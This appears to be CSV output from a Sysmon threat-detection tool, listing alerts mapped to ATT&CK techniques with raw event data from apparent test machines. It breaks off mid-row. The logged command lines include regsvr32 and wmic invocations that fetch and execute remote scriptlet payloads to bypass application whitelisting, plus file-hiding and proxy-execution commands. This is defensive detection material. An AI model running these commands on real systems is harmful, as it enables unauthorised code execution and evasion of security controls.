747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421218 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.428 + 747F3D96-75D1-5F8B-0000-00109EB23300 + 2628 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421218 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.428 + 747F3D96-75D1-5F8B-0000-00109EB23300 + 2628 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4939 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:53.759 + 747F3D96-6641-5D3F-0000-0010A38C8A00 + 4260 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4939 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:53.759 + 747F3D96-6641-5D3F-0000-0010A38C8A00 + 4260 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1594332045.590448,2020-07-10T02:00:45.590448+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311365 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-09 22:00:45.576 + 747F3D96-938D-5F07-0000-001043A84500 + 7976 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-86FA-5F07-0000-00204A8B0600 + 0x68b4a + 2 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-86FC-5F07-0000-00101E4B0700 + 2356 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436029.889688,2019-07-30T01:33:49.889688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4936 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:49.535 + 747F3D96-663D-5D3F-0000-00106F608A00 + 3240 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028513.920273,2019-03-20T00:48:33.920273+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966382 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:48:33.639 + 365ABB72-55A1-5C91-0000-0010D6960700 + 2368 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1158] Hidden Files and Directories,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\attrib.exe ) through command line ( attrib +h nbtscan.exe ) accessing hidden files and directories,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 22013 + + + + + Microsoft-Windows-Sysmon/Operational + DC1.insecurebank.local + + + + + technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories + 2019-05-19 17:32:00.478 + DFAE8213-9310-5CE1-0000-0010EABA0A00 + 2728 + C:\Windows\System32\attrib.exe + 6.3.9600.16384 (winblue_rtm.130821-1623) + Attribute Utility + Microsoft® Windows® Operating System + Microsoft Corporation + attrib +h nbtscan.exe + c:\ProgramData\ + insecurebank\Administrator + DFAE8213-9133-5CE1-0000-0020CC660500 + 0x566cc + 2 + High + SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02 + DFAE8213-91CC-5CE1-0000-0010BEF40600 + 3408 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436029.340889,2019-07-30T01:33:49.340889+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4934 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:44.949 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49829 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1564436026.095763,2019-07-30T01:33:46.095763+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4933 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:45.332 + 747F3D96-6639-5D3F-0000-001074F48900 + 208 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\calc.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4931 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.622 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4931 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.622 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4931 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.622 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1557854258.250959,2019-05-14T21:17:38.250959+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 32009 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-05-14 17:17:24.660 + ECAD0485-F2EC-5CDA-0000-0010F1631500 + 4092 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + insecurebank\Administrator + tcp + true + false + 10.59.4.20 + alice.insecurebank.local + 49584 + + false + 10.59.4.11 + DC1 + 389 + ldap + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1557854246.738627,2019-05-14T21:17:26.738627+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 32008 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-05-14 17:17:24.597 + ECAD0485-F2EC-5CDA-0000-0010F1631500 + 4092 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + insecurebank\Administrator + tcp + true + false + 10.59.4.20 + alice.insecurebank.local + 49583 + + false + 10.59.4.11 + DC1 + 389 + ldap + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4929 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.204 + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4929 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.204 + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1587853142.072006,2020-04-26T02:19:02.072006+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27334 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:01.724 + 747F3D96-B755-5EA4-0000-0010D06E2500 + 4484 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-3384-5EA5-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 596 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028513.459611,2019-03-20T00:48:33.459611+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966368 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:48:33.279 + 365ABB72-55A1-5C91-0000-0010AB8C0700 + 2112 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436019.372599,2019-07-30T01:33:39.372599+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4926 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:39.223 + 747F3D96-6633-5D3F-0000-001092628900 + 5056 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436019.358048,2019-07-30T01:33:39.358048+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4925 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:39.152 + 747F3D96-6633-5D3F-0000-001051608900 + 4092 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436085.311645,2019-07-30T01:34:45.311645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 